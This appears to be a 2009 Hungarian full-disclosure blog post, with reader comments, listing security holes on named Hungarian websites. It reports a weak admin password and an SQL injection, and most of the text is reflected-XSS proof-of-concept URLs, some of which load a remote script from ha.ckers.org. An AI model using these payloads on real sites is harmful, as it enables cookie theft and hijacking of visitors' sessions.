Mivel a komolyabb hibákat jeleztem az üzemeltetők felé, visszajelzést viszont nem kaptam, íme a nagy magyar valóság:
A hétvégén érkezett néhány érdekesség a postaládámba. Ptzool például a mav.hu adminisztrátori szekciójában vette észre, hogy a teszt felhasználó jelszava, khm...nem kifejezetten erős. Egyébként az egész oldal átjáróháznak tűnik, ráférne némi glettelés...
Frissítés: A kedves MÁV informatikás kollegák valahova áttették az admin felületet, miután megkapták az e-mailem (nem lett volna egyszerűbb rendes jelszavakat választani...), válaszolni persze már nem volt erejük. Sebaj, a site ettől ugyanúgy törhető marad...
Szicsu pedig egy rakat XSS-ről küldött tájékoztatást:
http://www.ok.hu/katalogus?q=%
3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E&mode= 1&hol=1
http://depo.hu/kereses-%22%3E%3Cimg%20src=x%20onerror=alert% 28document.cookie%29%20%3E
http://www.mindigtv.hu/SearchResult.aspx?searchStr=% 3Cscript%3Ealert%28document. cookie%29%3C/script%3E
http://halatortan.tv2.hu/index.php?action=receptkereso& keyword=%22%3Cscript%3Ealert% 28document.cookie%29%3C% 2Fscript%3E&sztar=1&olvaso=1& x=23&y=4
http://rtlklub.hu/archivum?keyword=%22%3Cscript%3Ealert% 28document.cookie%29%3C% 2Fscript%3E&type=1&year_from= 2004&month_from=01&day_from= 01&year_until=2009&month_ until=09&day_until=20&page=& channel=
http://www.hirtv.hu/?application=holmessearch& holmessearch_resid=887334& holmessearch_type=Advanced& holmessearch_artpage=1& holmessearch_productpage=1& holmessearch_exclsite=& holmessearch_inclsite=& holmessearch_fragment=2& holmessearch_exclude=& holmessearch_pageing=0& holmessearch_idonsite=& holmessearch_sortbydate=1& holmessearch_searchText=%22% 3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E& holmessearch_how=3& holmessearch__search=keres% E9s&holmessearch_ contenttypearticle=1& holmessearch_contenttypeforum= 0&holmessearch_ contenttypeproduct=0
http://atv.hu/kereses ( postol és getre nem lehet rávenni, tehát csak játszani lehet: "<script>alert(document.cookie)</script> )
Egy magát megnevezni nem kívánó illető az egyébként remek programnak ígérkező Kutatók Éjszakája oldalában talált elég triviális SQL injection sebezhetőségeket, végül pedig a StarBlog-on jelent meg egy kép, amin a Pécsi Közlekedési Zrt. okádja ki magából az adatbázisjelszót csak úgy spontán. Nem mintha amúgy nem lehetne triviálisan szétrontani az alkalmazást...
Remélem olvassák az illetékesek...
HelloTibi 2009.09.25. 12:26:05
http://www.szdsz.hu/pages.php?_NOMOCMS[entityname]=%3CSCRIPT%20SRC=ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
sajto.mdf.hu/belso.php?mid=szo_keres&szora=%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E&mehet_szora=Keres%E9s
orbanviktor.hu/search.php?search=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
mszp.hu keresés mezőbe:
gyere ide" onmouseover="alert('XSS!')"
www.mav-start.hu/search.php?query=%22%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
http://www.globalplaza.hu/search.php?search="><script>alert(document.cookie)<%2Fscript>&Submit2.x=14&Submit2.y=6&Submit2=Submit
www.jobinfo.hu/?frm_search_desc=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
_2501 2009.09.25. 23:01:10
Gratulálok, minden elismeresem ezekhez a remek, remek XSSekhez.
Biztosan faradtsagos munka volt megtalalni ezeket az igen veszelyes sebezhetosegeket ilyen nagy nevu es jol vedett weboldalakon, melyek mogott veteran programozok es feketeoves biztonsagtechnikai szakemberek hada 24/7 dolgozik a lehetseges biztonsagi resek felkutatasan es kijavitasan.
A tehetseg az tehetseg, nincs mese...
_2501 2009.09.25. 23:06:12
matx 2009.09.26. 00:42:07
_2501 2009.09.26. 02:18:22
pt|Zool 2009.09.26. 11:43:38
buherator · http://buhera.blog.hu 2009.09.26. 12:22:37
_2501 2009.09.26. 16:09:34
m1key · http://rootsite.hu 2009.09.27. 12:56:18
szoval a szakemberek annyira foltozgatjak az oldalt, hogy kozben email nincs idejuk olvasni...
_2501 2009.09.27. 13:04:53